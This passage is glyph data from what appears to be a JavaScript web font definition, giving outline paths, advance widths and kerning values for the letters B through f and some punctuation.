,"j":-5,"i":-2,"h":-2,"g":-12,"f":-2,"d":-4,"c":-2,"b":-2,"Z":-13,"Y":32,"X":-17,"V":17,"U":4,"S":-6,"Q":4,"M":-10,"J":-2,"G":4,"?":-5,";":-13,":":-13,"\/":-17,".":-13,",":-13,"*":19,"!":-2,"A":-17,"\u00a5":-17,"C":4,"\u00c6":4,"O":4,"T":26,"W":12,"a":-7,"\u00b9":-7,"o":-2}},"B":{"d":"135,-126v43,0,60,18,60,61v0,90,-104,60,-183,65r0,-240v73,6,176,-27,176,60v0,40,-19,47,-53,54xm90,-144v22,1,25,-2,25,-26v0,-19,-7,-20,-25,-19r0,45xm110,-51v16,-14,13,-60,-20,-48r0,49","w":196,"k":{"\u0106":-1,"\u0119":-4,"\u0105":-5,"\u0104":-7,"\u00c1":-7,"\u00c2":-7,"\u00ff":-2,"\u2019":-4,"\u201d":-4,"\u2014":-7,"\u2013":-7,"\u00c3":-7,"\u00c0":-7,"\u2026":-2,"\u00f8":-4,"\u00df":-2,"\u00fc":-2,"\u00fb":-2,"\u00f9":-2,"\u00fa":-2,"\u00f5":-4,"\u00f6":-4,"\u00f4":-4,"\u00f2":-4,"\u00f3":-4,"\u00ef":-11,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00eb":-4,"\u00e8":-4,"\u00e9":-4,"\u00e7":-4,"\u00e5":-5,"\u00e3":-5,"\u00e4":-5,"\u00e2":-5,"\u00e0":-5,"\u00e1":-5,"\u00c7":-1,"\u00c5":-7,"\u00c4":-7,"z":-2,"y":-2,"x":-2,"w":-2,"v":-2,"u":-2,"t":-2,"s":-2,"r":-2,"q":-4,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-2,"i":-2,"h":-2,"g":-2,"f":-2,"d":-4,"c":-4,"b":-2,"Y":4,"V":-1,";":-2,":":-2,".":-2,"-":-7,",":-2,"A":-7,"\u00a5":-7,"C":-1,"\u00c6":-1,"T":-1,"a":-5,"\u00b9":-5,"e":-4,"\u00ea":-4,"o":-4}},"C":{"d":"86,-119v0,56,31,80,76,60r6,54v-91,31,-163,-17,-163,-114v0,-94,69,-148,158,-116r-8,51v-46,-13,-69,12,-69,65","w":165,"k":{"\u0106":10,"\u0119":2,"\u0105":-5,"\u0104":-12,"\u00d2":10,"\u00d4":10,"\u00d3":10,"\u00c1":-12,"\u00c2":-12,"\u00ff":5,"\u2019":-2,"\u201d":-2,"\u00d5":10,"\u00c3":-12,"\u00c0":-12,"\u2026":-13,"\u00d8":10,"\u2122":-12,"\u00ae":12,"\u00ef":-29,"\u00ee":-12,"\u00ec":-2,"\u00ed":-2,"\u00eb":2,"\u00e8":2,"\u00e9":2,"\u00e5":-5,"\u00e3":-5,"\u00e4":-5,"\u00e2":-5,"\u00e0":-5,"\u00e1":-5,"\u00d6":10,"\u00c7":10,"\u00c5":-12,"\u00c4":-12,"y":5,"r":-2,"p":-2,"n":-2,"m":-2,"l":-2,"k":-2,"j":-2,"i":-2,"h":-2,"b":-2,"Y":-7,"S":-4,"Q":10,"G":10,"?":-5,";":-13,":":-13,"\/":-15,".":-13,",":-13,"*":-6,"!":-5,"A":-12,"\u00a5":-12,"C":10,"\u00c6":10,"O":10,"T":-6,"a":-5,"\u00b9":-5,"e":2,"\u00ea":2}},"D":{"d":"93,-240v81,-1,112,38,112,118v0,79,-33,123,-114,122r-79,0r0,-240r81,0xm91,-57v36,0,35,-20,35,-61v0,-40,2,-66,-35,-65r0,126","w":210,"k":{"\u0105":4,"\u0104":4,"\u00c1":4,"\u00c2":4,"\u00ff":-6,"\u2019":-5,"\u201d":-5,"\u2014":-5,"\u2013":-5,"\u00c3":4,"\u00c0":4,"\u2026":21,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":4,"\u00c4":4,"y":-6,"w":-6,"v":-6,"Z":10,"Y":13,"V":2,"S":-1,"?":5,";":-7,":":-7,"\/":15,".":21,"-":-5,",":21,"A":4,"\u00a5":4,"T":9,"a":4,"\u00b9":4}},"E":{"d":"170,0r-158,0r0,-240r158,0r0,53r-79,5r0,33r61,0r0,52r-61,0r0,36r79,5r0,56","w":174,"k":{"\u00ea":5,"\u00c6":9,"\u00a5":-7,"\u00b9":-1,"o":3,"e":5,"a":-1,"W":-8,"T":-5,"O":9,"C":9,"A":-7,"\u0106":9,"\u0119":5,"\u0105":-1,"\u0104":-7,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":-7,"\u00c2":-7,"\u00ff":5,"\u2019":-5,"\u201d":-5,"\u2014":2,"\u2013":2,"\u00d5":9,"\u00c3":-7,"\u00c0":-7,"\u2026":-7,"\u00f8":5,"\u00d8":9,"\u2122":-12,"\u00df":-1,"\u00fc":1,"\u00fb":1,"\u00f9":1,"\u00fa":1,"\u00f5":3,"\u00f6":3,"\u00f4":3,"\u00f2":3,"\u00f3":3,"\u00ef":-25,"\u00ee":-13,"\u00eb":5,"\u00e8":5,"\u00e9":5,"\u00e7":4,"\u00e5":-1,"\u00e3":-1,"\u00e4":-1,"\u00e2":-1,"\u00e0":-1,"\u00e1":-1,"\u00d6":9,"\u00c7":9,"\u00c5":-7,"\u00c4":-7,"z":-8,"y":5,"x":-5,"w":5,"v":5,"u":1,"t":1,"q":4,"l":-1,"k":-1,"h":-1,"g":-6,"f":-1,"d":4,"c":4,"b":-1,"Z":-7,"Y":-7,"X":-6,"V":-7,"S":1,"Q":9,"M":-2,"G":9,";":-7,":":-7,"\/":-7,".":-7,"-":2,",":-7,"*":-6}},"F":{"d":"171,-187r-80,5r0,33r61,0r0,52r-61,0r0,97r-79,0r0,-240r159,0r0,53","w":169,"k":{"\u0106":6,"\u0119":10,"\u0105":22,"\u0104":22,"\u00d2":6,"\u00d4":6,"\u00d3":6,"\u00c1":22,"\u00c2":22,"\u00ff":6,"\u2019":-12,"\u201d":-12,"\u2014":6,"\u2013":6,"\u00d5":6,"\u00c3":22,"\u00c0":22,"\u2026":62,"\u00f8":10,"\u00d8":6,"\u2122":-19,"\u00fc":9,"\u00fb":9,"\u00f9":9,"\u00fa":9,"\u00f5":10,"\u00f6":10,"\u00f4":10,"\u00f2":10,"\u00f3":10,"\u00ef":-33,"\u00ee":-17,"\u00ec":-2,"\u00eb":10,"\u00e8":10,"\u00e9":10,"\u00e7":8,"\u00e5":22,"\u00e3":22,"\u00e4":22,"\u00e2":22,"\u00e0":22,"\u00e1":22,"\u00d6":6,"\u00c7":6,"\u00c5":22,"\u00c4":22,"y":6,"u":9,"r":9,"q":8,"p":9,"n":9,"m":9,"d":8,"c":8,"Y":-12,"S":-6,"Q":6,"G":6,"?":-5,";":5,":":5,"\/":36,".":62,"-":6,",":62,"*":-12,"!":-5,"A":22,"\u00a5":22,"C":6,"\u00c6":6,"O":6,"T":-12,"a":22,"\u00b9":22,"e":10,"\u00ea":10,"o":10}},"G":{"d":"87,-120v0,45,7,73,51,66r0,-34r-30,0r0,-51r102,0r0,123v-37,14,-70,21,-96,21v-72,0,-109,-49,-109,-124v0,-111,94,-151,192,-109r-15,49v-54,-22,-95,-8,-95,59","w":219,"k":{"\u00a5":-1,"W":6,"T":12,"A":-1,"\u0104":-1,"\u00c1":-1,"\u00c2":-1,"\u2019":15,"\u201d":15,"\u2014":-2,"\u2013":-2,"\u00c3":-1,"\u00c0":-1,"\u2026":-2,"\u2122":7,"\u00ef":-6,"\u00c5":-1,"\u00c4":-1,"w":1,"Y":13,"S":1,"?":5,";":-2,":":-2,"\/":2,".":-2,"-":-2,",":-2,"*":12,"!":2}},"H":{"d":"201,0r-80,0r0,-97r-29,0r0,97r-80,0r0,-240r80,0r0,91r29,0r0,-91r80,0r0,240","w":212,"k":{"\u00ef":-18,"\u00ee":-4}},"I":{"d":"91,0r-79,0r0,-240r79,0r0,240","w":103,"k":{"\u00ef":-18,"\u00ee":-4}},"J":{"d":"-4,36v13,-21,16,-35,16,-72r0,-204r79,0r-1,233v-3,37,-28,53,-51,72","w":103,"k":{"\u00ef":-18,"\u00ee":-4}},"K":{"d":"213,0r-87,0r-35,-90r0,90r-79,0r0,-240r79,0r0,89r34,-89r80,0r-53,110","w":206,"k":{"\u0106":15,"\u0119":7,"\u0104":-15,"\u00d9":7,"\u00db":7,"\u00da":7,"\u00d2":15,"\u00d4":15,"\u00d3":15,"\u00c1":-15,"\u00c2":-15,"\u00ff":17,"\u2019":2,"\u201d":2,"\u2014":14,"\u2013":14,"\u00d5":15,"\u00c3":-15,"\u00c0":-15,"\u2026":-11,"\u00f8":5,"\u00d8":15,"\u2122":-12,"\u00ae":19,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00ef":-29,"\u00ee":-10,"\u00ec":-2,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":5,"\u00dc":7,"\u00d6":15,"\u00c7":15,"\u00c5":-15,"\u00c4":-15,"y":17,"w":13,"v":17,"u":2,"q":5,"l":-1,"k":-1,"h":-1,"d":5,"c":5,"b":-1,"Y":-7,"U":7,"S":-5,"Q":15,"G":15,"?":-5,";":-15,":":-11,"\/":-19,".":-11,"-":14,",":-15,"*":5,"!":-5,"A":-15,"\u00a5":-15,"C":15,"\u00c6":15,"O":15,"T":-4,"e":7,"\u00ea":7,"o":5}},"L":{"d":"166,0r-154,0r0,-240r79,0r0,180r75,4r0,56","w":164,"k":{"\u0106":7,"\u0105":-7,"\u0104":-13,"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":8,"\u00d4":8,"\u00d3":8,"\u00c1":-13,"\u00c2":-13,"\u00ff":10,"\u2019":24,"\u201d":24,"\u00d5":8,"\u00c3":-13,"\u00c0":-13,"\u2026":-13,"\u00f8":-4,"\u00d8":10,"\u2122":36,"\u00ae":24,"\u00f5":-4,"\u00f6":-4,"\u00f4":-4,"\u00f2":-4,"\u00f3":-4,"\u00ef":-2,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00e7":-4,"\u00e5":-7,"\u00e3":-7,"\u00e4":-7,"\u00e2":-7,"\u00e0":-7,"\u00e1":-7,"\u00dc":4,"\u00d6":8,"\u00c7":10,"\u00c5":-13,"\u00c4":-13,"y":10,"w":10,"r":-2,"q":-4,"n":-2,"m":-2,"l":-2,"i":-2,"h":-2,"d":-4,"c":-4,"Z":-12,"Y":36,"V":22,"U":4,"S":-5,"Q":8,"M":-10,"G":10,"?":-2,";":-13,":":-13,"\/":-10,".":-13,",":-13,"*":46,"A":-13,"\u00a5":-13,"C":7,"\u00c6":7,"O":8,"T":29,"W":14,"a":-7,"\u00b9":-7,"o":-4}},"M":{"d":"274,0r-77,0r-10,-155r-22,155r-53,0r-22,-154r-11,154r-77,0r24,-240r91,0r21,121r21,-121r91,0","w":276,"k":{"\u00a5":-10,"\u00b9":-4,"o":-2,"a":-4,"A":-10,"\u0105":-4,"\u0104":-10,"\u00d9":2,"\u00db":2,"\u00da":2,"\u00c1":-10,"\u00c2":-10,"\u00ff":4,"\u2019":5,"\u201d":5,"\u2014":-4,"\u2013":-4,"\u00c3":-10,"\u00c0":-10,"\u2026":-8,"\u00f8":-2,"\u00fc":1,"\u00fb":1,"\u00f9":1,"\u00fa":1,"\u00f5":-2,"\u00f6":-2,"\u00f4":-2,"\u00f2":-2,"\u00f3":-2,"\u00ef":-7,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00dc":2,"\u00c5":-10,"\u00c4":-10,"y":4,"u":1,"s":-4,"Y":12,"U":2,"M":-4,"?":-2,";":-8,":":-8,"\/":-7,".":-8,"-":-4,",":-8,"!":-2}},"N":{"d":"200,0r-83,0r-43,-143r0,143r-62,0r0,-240r83,0r42,141r0,-141r63,0r0,240","w":211,"k":{"\u00ef":-18,"\u00ee":-4}},"O":{"d":"105,-244v67,0,100,52,100,124v0,72,-32,124,-100,124v-67,0,-100,-51,-100,-122v0,-74,31,-125,100,-126xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68","w":210,"k":{"\u0105":4,"\u0104":4,"\u00c1":4,"\u00c2":4,"\u00ff":-7,"\u2019":-5,"\u201d":-5,"\u2014":-5,"\u2013":-5,"\u00c3":4,"\u00c0":4,"\u2026":15,"\u00e7":-1,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":4,"\u00c4":4,"z":-4,"y":-7,"x":2,"w":-7,"v":-7,"t":-5,"s":-1,"q":-1,"g":-2,"f":-5,"d":-1,"c":-1,"Z":7,"Y":13,"X":8,"V":4,"S":-1,"?":5,";":-7,":":-7,"\/":14,".":15,"-":-5,",":15,"A":4,"\u00a5":4,"T":8,"W":-1,"a":4,"\u00b9":4}},"P":{"d":"192,-160v0,56,-40,84,-101,79r0,81r-79,0r0,-240r81,0v66,0,99,27,99,80xm117,-157v1,-20,-6,-25,-26,-24r0,47v17,1,26,-4,26,-23","w":194,"k":{"\u0119":7,"\u0105":14,"\u0104":17,"\u00c1":17,"\u00c2":17,"\u00ff":-9,"\u2019":-12,"\u201d":-12,"\u2014":8,"\u2013":8,"\u00c3":17,"\u00c0":17,"\u2026":77,"\u00f8":5,"\u00ae":-7,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00ef":-7,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e5":14,"\u00e3":14,"\u00e4":14,"\u00e2":14,"\u00e0":14,"\u00e1":14,"\u00c5":17,"\u00c4":17,"y":-9,"Y":4,"S":-6,"?":5,";":-5,":":-5,"\/":36,".":77,"-":8,",":77,"*":-10,"!":-2,"A":17,"\u00a5":17,"T":-4,"a":14,"\u00b9":14,"e":7,"\u00ea":7,"o":5}},"Q":{"d":"105,-244v67,0,100,52,100,124v0,69,-28,117,-87,124v0,17,28,21,48,14r9,40v-38,17,-104,22,-104,-25v0,-9,2,-20,6,-32v-50,-15,-71,-54,-72,-121v-1,-72,33,-124,100,-124xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68","w":210,"k":{"\u00a5":4,"\u00b9":4,"a":4,"T":11,"A":4,"\u0105":4,"\u0104":4,"\u00c1":4,"\u00c2":4,"\u00ff":-7,"\u2019":-4,"\u201d":-4,"\u2014":-5,"\u2013":-5,"\u00c3":4,"\u00c0":4,"\u2026":15,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":4,"\u00c4":4,"y":-7,"t":-5,"Y":13,"S":-1,"?":5,";":-7,":":-7,"\/":14,".":15,"-":-5,",":15}},"R":{"d":"12,-240v82,2,188,-19,186,65v0,29,-14,49,-41,60r61,115r-83,0r-44,-97r0,97r-79,0r0,-240xm91,-145v18,1,26,-3,26,-22v0,-18,-8,-22,-26,-21r0,43","w":210,"k":{"\u0106":10,"\u0119":8,"\u0104":-17,"\u00d9":6,"\u00db":6,"\u00da":6,"\u00d2":10,"\u00d4":10,"\u00d3":10,"\u00c1":-17,"\u00c2":-17,"\u00ff":-1,"\u2019":-1,"\u201d":-1,"\u2014":17,"\u2013":17,"\u00d5":10,"\u00c3":-17,"\u00c0":-17,"\u2026":-12,"\u00f8":4,"\u00d8":10,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00ef":-5,"\u00ee":-2,"\u00ec":-2,"\u00ed":-2,"\u00eb":8,"\u00e8":8,"\u00e9":8,"\u00dc":6,"\u00d6":10,"\u00c7":10,"\u00c5":-17,"\u00c4":-17,"y":-1,"u":2,"t":-2,"Z":-12,"Y":8,"X":-17,"V":4,"U":6,"S":-5,"Q":10,"M":-10,"G":10,";":-15,":":-12,"\/":-19,".":-12,"-":17,",":-15,"A":-17,"\u00a5":-17,"C":10,"\u00c6":10,"O":10,"T":4,"e":8,"\u00ea":8,"o":4}},"S":{"d":"20,-116v-45,-51,-3,-128,72,-128v23,0,50,6,73,12r-16,55v-20,-8,-36,-12,-50,-12v-28,0,-30,19,-7,28v37,15,82,31,81,81v-1,80,-90,102,-170,73r15,-57v20,8,38,12,52,12v23,2,33,-15,19,-25v-15,-10,-59,-27,-69,-39","w":174,"k":{"\u00ea":-4,"\u00c6":-1,"\u00a5":-2,"\u00b9":-4,"o":-4,"e":-4,"a":-4,"W":-1,"T":2,"O":-1,"C":-1,"A":-2,"\u0106":-1,"\u0119":-4,"\u0105":-4,"\u0104":-2,"\u00d2":-1,"\u00d4":-1,"\u00d3":-1,"\u00c1":-2,"\u00c2":-2,"\u00ff":1,"\u2019":7,"\u201d":7,"\u2014":-9,"\u2013":-9,"\u00d5":-1,"\u00c3":-2,"\u00c0":-2,"\u2026":5,"\u00f8":-4,"\u00d8":-1,"\u00f5":-4,"\u00f6":-4,"\u00f4":-4,"\u00f2":-4,"\u00f3":-4,"\u00ef":-19,"\u00ee":-6,"\u00eb":-4,"\u00e8":-4,"\u00e9":-4,"\u00e7":-4,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00d6":-1,"\u00c7":-1,"\u00c5":-2,"\u00c4":-2,"y":1,"v":1,"t":-1,"q":-4,"d":-4,"c":-4,"V":-1,"S":5,"Q":-1,"G":-1,"\/":2,".":5,"-":-9,",":5,"*":10}},"T":{"d":"176,-186r-50,4r0,182r-79,0r0,-182r-48,-5r0,-53r177,0r0,54","w":174,"k":{"\u0106":8,"\u0119":33,"\u0105":35,"\u0104":26,"\u00d2":8,"\u00d4":8,"\u00d3":8,"\u00c1":26,"\u00c2":26,"\u00ff":12,"\u2019":-10,"\u201d":-10,"\u2014":33,"\u2013":33,"\u00d5":8,"\u00c3":26,"\u00c0":26,"\u2026":35,"\u00f8":33,"\u00d8":8,"\u2122":-24,"\u00ae":7,"\u00fc":12,"\u00f3":33,"\u00ef":-31,"\u00ee":-17,"\u00d6":8,"\u00c7":8,"\u00c5":26,"\u00c4":26,"y":12,"w":12,"v":33,"u":19,"s":31,"r":19,"q":33,"c":33,"Z":-8,"Y":-13,"V":-14,"S":-4,"Q":9,"G":8,"?":-5,";":29,":":29,"\/":26,".":35,"-":33,",":35,"*":-14,"!":-5,"A":26,"\u00a5":26,"C":8,"\u00c6":8,"O":8,"T":-10,"W":-14,"a":35,"\u00b9":35,"e":33,"\u00ea":33,"o":33}},"U":{"d":"92,-62v5,15,29,14,29,-9r0,-169r79,0r0,172v0,50,-40,74,-94,74v-54,0,-93,-24,-94,-74r0,-172r79,0","w":211,"k":{"\u00a5":4,"A":4,"\u0104":4,"\u00c1":4,"\u00c2":4,"\u00c3":4,"\u00c0":4,"\u2026":10,"\u00ef":-18,"\u00ee":-4,"\u00c5":4,"\u00c4":4,"x":4,"X":3,"M":2,"\/":10,".":10,",":10}},"V":{"d":"197,-240r-54,240r-95,0r-54,-240r82,0r19,156r20,-156r82,0","w":190,"k":{"\u00ea":13,"\u00c6":4,"\u00a5":17,"\u00b9":17,"o":11,"e":13,"a":17,"W":-17,"O":4,"C":4,"A":17,"\u0106":4,"\u0119":13,"\u0105":17,"\u0104":17,"\u00d2":4,"\u00d4":4,"\u00d3":4,"\u00c1":17,"\u00c2":17,"\u2019":-10,"\u201d":-12,"\u2014":12,"\u2013":12,"\u00d5":4,"\u00c3":17,"\u00c0":17,"\u2026":29,"\u00f8":11,"\u00d8":4,"\u2122":-19,"\u00fc":7,"\u00fb":7,"\u00f9":7,"\u00fa":7,"\u00f5":11,"\u00f6":11,"\u00f4":11,"\u00f2":11,"\u00f3":11,"\u00ef":-36,"\u00ee":-19,"\u00ec":-7,"\u00eb":13,"\u00e8":13,"\u00e9":13,"\u00e5":17,"\u00e3":17,"\u00e4":17,"\u00e2":17,"\u00e0":17,"\u00e1":17,"\u00d6":4,"\u00c7":4,"\u00c5":17,"\u00c4":17,"u":7,"s":5,"r":7,"p":6,"n":7,"m":7,"l":-2,"k":-2,"i":-2,"h":-2,"b":-2,"Y":-17,"V":-17,"S":-6,"Q":4,"G":4,"?":-7,";":5,":":5,"\/":21,".":29,"-":12,",":29,"*":-14,"!":-7}},"W":{"d":"281,-240r-41,240r-82,0r-20,-135r-20,135r-82,0r-42,-240r81,0r16,154r19,-154r57,0r18,155r17,-155r79,0","w":275,"k":{"\u0106":-1,"\u0119":6,"\u0105":11,"\u0104":12,"\u00d2":-1,"\u00d4":-1,"\u00d3":-1,"\u00c1":12,"\u00c2":12,"\u00ff":-5,"\u2019":-12,"\u201d":-12,"\u2014":6,"\u2013":6,"\u00d5":-1,"\u00c3":12,"\u00c0":12,"\u2026":19,"\u00f8":5,"\u00d8":-1,"\u2122":-19,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00ef":-36,"\u00ee":-19,"\u00ec":-7,"\u00eb":6,"\u00e8":6,"\u00e9":6,"\u00e7":6,"\u00e5":11,"\u00e3":11,"\u00e4":11,"\u00e2":11,"\u00e0":11,"\u00e1":11,"\u00d6":-1,"\u00c7":-1,"\u00c5":12,"\u00c4":12,"y":-5,"u":4,"t":-7,"s":1,"r":4,"n":4,"m":4,"l":-2,"k":-2,"i":-2,"h":-2,"d":6,"c":6,"b":-2,"Y":-17,"X":-14,"V":-14,"S":-8,"Q":-1,"G":-1,"?":-7,";":-2,":":-2,"\/":12,".":19,"-":6,",":19,"*":-14,"!":-7}},"X":{"d":"201,0r-81,0r-22,-97r-22,97r-82,0r42,-131r-38,-109r80,0r20,81r19,-81r80,0r-38,109","w":195,"k":{"\u00ea":4,"\u00c6":8,"\u00a5":-17,"\u00b9":-4,"e":4,"a":-4,"T":-8,"O":8,"C":8,"A":-17,"\u0106":8,"\u0119":4,"\u0105":-4,"\u0104":-17,"\u00d9":3,"\u00db":3,"\u00da":3,"\u00d2":8,"\u00d4":8,"\u00d3":8,"\u00c1":-17,"\u00c2":-17,"\u00ff":8,"\u2019":-2,"\u201d":-2,"\u2014":6,"\u2013":6,"\u00d5":8,"\u00c3":-17,"\u00c0":-17,"\u2026":-13,"\u00d8":8,"\u2122":-12,"\u00ae":12,"\u00fc":1,"\u00fb":1,"\u00f9":1,"\u00fa":1,"\u00ef":-31,"\u00ee":-14,"\u00ec":-2,"\u00eb":4,"\u00e8":4,"\u00e9":4,"\u00e7":1,"\u00e5":-4,"\u00e3":-4,"\u00e4":-4,"\u00e2":-4,"\u00e0":-4,"\u00e1":-4,"\u00dc":3,"\u00d6":8,"\u00c7":8,"\u00c5":-17,"\u00c4":-17,"y":8,"u":1,"r":-2,"q":1,"n":-2,"m":-2,"l":-2,"k":-2,"i":-2,"h":-2,"Y":-12,"X":-17,"U":3,"S":-5,"Q":8,"G":8,";":-13,":":-13,"\/":-21,".":-13,"-":6,",":-13}},"Y":{"d":"205,-240r-69,156r0,84r-79,0r0,-84r-64,-156r85,0r20,79r22,-79r85,0","w":197,"k":{"\u00ea":32,"\u00c6":14,"\u00a5":32,"\u00b9":33,"o":31,"e":32,"a":33,"T":-13,"O":14,"C":14,"A":32,"\u0106":14,"\u0119":32,"\u0105":33,"\u0104":32,"\u00d2":14,"\u00d4":14,"\u00d3":14,"\u00c1":32,"\u00c2":32,"\u2019":-7,"\u201d":-7,"\u2014":33,"\u2013":33,"\u00d5":14,"\u00c3":32,"\u00c0":32,"\u2026":49,"\u00f8":31,"\u00d8":14,"\u2122":-19,"\u00ae":7,"\u00fc":7,"\u00fb":21,"\u00f9":21,"\u00fa":21,"\u00f5":31,"\u00f6":31,"\u00f4":31,"\u00f2":31,"\u00f3":31,"\u00ef":-36,"\u00ee":-19,"\u00ec":-7,"\u00eb":32,"\u00e8":32,"\u00e9":32,"\u00e7":32,"\u00e5":33,"\u00e3":33,"\u00e4":33,"\u00e2":33,"\u00e0":33,"\u00e1":33,"\u00d6":14,"\u00c7":14,"\u00c5":32,"\u00c4":32,"z":13,"w":8,"v":8,"u":21,"s":26,"r":21,"q":31,"p":21,"n":21,"m":21,"d":32,"c":32,"Z":-9,"Y":-19,"S":4,"Q":14,"M":12,"G":14,"?":-7,";":23,":":23,"\/":29,".":49,"-":33,",":49,"*":-10,"!":-7}},"Z":{"d":"167,0r-166,0r0,-33r69,-148r-69,-6r0,-53r165,0r0,37r-65,142r66,6r0,55","w":167,"k":{"\u00ea":2,"\u00c6":7,"\u00a5":-11,"\u00b9":-6,"e":2,"a":-6,"O":7,"C":7,"A":-11,"\u0106":7,"\u0119":2,"\u0105":-6,"\u0104":-11,"\u00d2":7,"\u00d4":7,"\u00d3":7,"\u00c1":-11,"\u00c2":-11,"\u00ff":1,"\u2019":-7,"\u201d":-7,"\u2014":5,"\u2013":5,"\u00d5":7,"\u00c3":-11,"\u00c0":-11,"\u2026":-12,"\u00d8":7,"\u2122":-19,"\u00ef":-31,"\u00ee":-17,"\u00eb":2,"\u00e8":2,"\u00e9":2,"\u00e5":-6,"\u00e3":-6,"\u00e4":-6,"\u00e2":-6,"\u00e0":-6,"\u00e1":-6,"\u00d6":7,"\u00c7":7,"\u00c5":-11,"\u00c4":-11,"y":1,"Z":-11,"Y":-11,"S":-5,"Q":7,"G":7,"?":-5,";":-12,":":-12,"\/":-12,".":-12,"-":5,",":-12,"*":-10,"!":-5}},"[":{"d":"94,35r-82,0r0,-310r82,0r0,35r-20,0r0,240r20,0r0,35","w":0},"\\":{"d":"146,5r-43,0r-91,-248r43,0","w":157},"]":{"d":"80,35r-82,0r0,-35r20,0r0,-240r-20,0r0,-35r82,0r0,310","w":91},"^":{"d":"99,-120v4,7,20,13,14,20r-17,-17v-7,4,-13,20,-20,14r16,-17v-4,-7,-19,-13,-13,-20r17,17v7,-4,13,-20,20,-14","w":191},"_":{"d":"183,55r-183,0r0,-26r183,0r0,26","w":183},"`":{"d":"78,-218r-20,17r-53,-36r32,-31","w":82},"a":{"d":"22,-171v61,-16,145,-26,145,52r0,119r-63,0r-4,-14v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16","w":179,"k":{"\u2122":12,"z":-2,"s":2,"g":-1,"*":10}},"b":{"d":"79,-172v56,-28,100,18,100,82v0,63,-47,122,-100,81r-7,9r-60,0r0,-239r67,-6r0,73xm79,-54v22,0,28,-11,28,-35v-1,-26,-8,-37,-28,-36r0,71","w":183,"k":{"\u00ea":-1,"o":-1,"e":-1,"\u0119":-1,"\u2019":2,"\u201d":2,"\u2014":-5,"\u2013":-5,"\u2026":7,"\u00f8":-1,"\u2122":12,"\u00f5":-1,"\u00f6":-1,"\u00f4":-1,"\u00f2":-1,"\u00f3":-1,"\u00eb":-1,"\u00e8":-1,"\u00e9":-1,"\u00e7":-1,"q":-1,"d":-1,"c":-1,";":-4,":":-4,"\/":7,".":7,"-":-5,",":7,"*":10}},"c":{"d":"5,-89v0,-72,55,-109,123,-85r-8,48v-27,-11,-46,2,-46,37v0,36,22,48,48,35r8,50v-71,25,-125,-9,-125,-85","w":128,"k":{"\u00ea":5,"\u00b9":-1,"o":3,"e":5,"a":-1,"\u0119":5,"\u0105":-1,"\u00ff":-8,"\u2019":-13,"\u201d":-13,"\u2014":7,"\u2013":7,"\u2026":-12,"\u00f8":3,"\u00ae":-12,"\u00f5":3,"\u00f6":3,"\u00f4":3,"\u00f2":3,"\u00f3":3,"\u00eb":5,"\u00e8":5,"\u00e9":5,"\u00e7":5,"\u00e5":-1,"\u00e3":-1,"\u00e4":-1,"\u00e2":-1,"\u00e0":-1,"\u00e1":-1,"y":-8,"t":-8,"s":-4,"q":3,"d":3,"c":5,"?":-2,";":-12,":":-12,"\/":-12,".":-12,"-":7,",":-12,"*":-10,"!":-2}},"d":{"d":"5,-88v0,-63,42,-115,99,-85r0,-66r67,-6r0,245r-66,0r0,-9v-53,40,-100,-14,-100,-79xm104,-123v-24,1,-28,11,-28,38v0,24,8,34,28,33r0,-71","w":183,"k":{"\u00ef":-18,"\u00ee":-4}},"e":{"d":"5,-92v0,-54,28,-89,82,-89v58,0,83,48,74,115r-82,0v4,24,46,24,70,16r10,45v-76,26,-154,0,-154,-87xm102,-105v1,-19,-5,-32,-16,-31v-10,0,-16,10,-16,31r32,0","w":166,"k":{"\u00ea":-1,"o":-1,"e":-1,"\u0119":-1,"\u2019":2,"\u201d":2,"\u2014":-7,"\u2013":-7,"\u2026":-2,"\u00f8":-1,"\u2122":12,"\u00f5":-1,"\u00f6":-1,"\u00f4":-1,"\u00f2":-1,"\u00f3":-1,"\u00eb":-1,"\u00e8":-1,"\u00e9":-1,"\u00e7":-1,"z":-2,"s":-1,"q":-1,"g":-2,"f":-1,"d":-1,"c":-1,";":-5,":":-5,"\/":5,".":-2,"-":-7,",":-2,"*":11}},"f":{"d":"119,-239r-10,45v-15,-5,-27,-1,-27,16r25,0r0,42r-25,4r0,132r-68,0r0,-132r-15,-4r0,-42r15,0v-10,-61,48,-73,105,-61","w":104,"k":{"\u00ea":2,"\u00b9":10,"e":2,"a":10,"\u0119":2,"\u0105":10,"\u00ff":-12,"\u2019":-17,"\u201d":-17,"\u2014":8,"\u2013":8,"\u2026":11,"\u00f8":2,"\u2122":-29,"\u00ae":-17,"\u00fc":-2,"\u00fb":-2,"\u00f9":-2,"\u00fa":-2,"\u00ef":-43,"\u00ee":-28,"\u00ec":-14,"\u00ed":-5,"